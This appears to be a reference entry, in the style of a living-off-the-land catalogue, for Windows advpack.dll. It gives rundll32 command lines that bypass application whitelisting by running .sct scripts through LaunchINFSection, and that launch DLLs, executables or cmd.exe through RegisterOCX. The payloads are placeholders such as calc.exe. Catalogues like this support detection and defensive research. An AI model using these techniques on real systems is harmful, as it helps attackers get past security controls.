~/Windows# cat Advpack.dll.md █
Utility for installing software and drivers with rundll32.exe
Paths:
c:\windows\system32\advpack.dll
c:\windows\syswow64\advpack.dll
Detection:
AWL bypass
Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,
Execute
Launch a DLL payload by calling the RegisterOCX function.
rundll32.exe advpack.dll,RegisterOCX test.dll
Launch an executable by calling the RegisterOCX function.
rundll32.exe advpack.dll,RegisterOCX calc.exe
Launch command line by calling the RegisterOCX function.
rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"